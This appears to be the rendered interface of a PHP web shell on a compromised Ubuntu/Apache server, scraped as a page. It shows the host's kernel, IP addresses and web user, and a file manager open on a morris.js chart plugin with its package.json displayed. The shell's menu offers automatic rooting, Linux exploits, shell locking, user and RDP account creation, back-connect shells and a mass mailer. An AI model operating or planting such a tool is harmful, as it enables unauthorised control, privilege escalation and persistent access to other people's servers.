Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.129.194.30
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
phdadm /
admin /
plugins /
morrisjs /
[ HOME SHELL ]
Name
Size
Permission
Action
examples
[ DIR ]
drwxr-xr-x
less
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
spec
[ DIR ]
drwxr-xr-x
.gitignore
76
B
-rwxr-xr-x
.travis.yml
590
B
-rwxr-xr-x
Gruntfile.js
2.22
KB
-rwxr-xr-x
README.md
9.88
KB
-rwxr-xr-x
bower.json
391
B
-rwxr-xr-x
bower.travis.json
390
B
-rwxr-xr-x
morris.css
433
B
-rwxr-xr-x
morris.js
64.5
KB
-rwxr-xr-x
morris.min.js
34.82
KB
-rwxr-xr-x
package.json
871
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "morris.js", "version": "0.5.0", "homepage": "http://morrisjs.github.com/morris.js", "license": "BSD-2-Clause", "description": "Easy, pretty charts", "author": { "name": "Olly Smith", "email": "olly@oesmith.co.uk" }, "repository": { "type": "git", "url": "git://github.com/morrisjs/morris.js.git" }, "bugs": { "url": "https://github.com/morrisjs/morris.js/issues" }, "devDependencies": { "matchdep": "~0.1.2", "grunt": "~0.4.1", "grunt-mocha": "~0.4.10", "grunt-contrib-concat": "~0.3.0", "grunt-contrib-coffee": "~0.7.0", "grunt-contrib-uglify": "~0.2.4", "grunt-contrib-less": "~0.7.0", "grunt-contrib-watch": "~0.5.3", "grunt-shell": "~0.5.0", "bower": "~1.2.8" }, "scripts": { "test": "grunt concat coffee mocha" }, "engines": { "node": ">=0.8 <0.11" } }
Close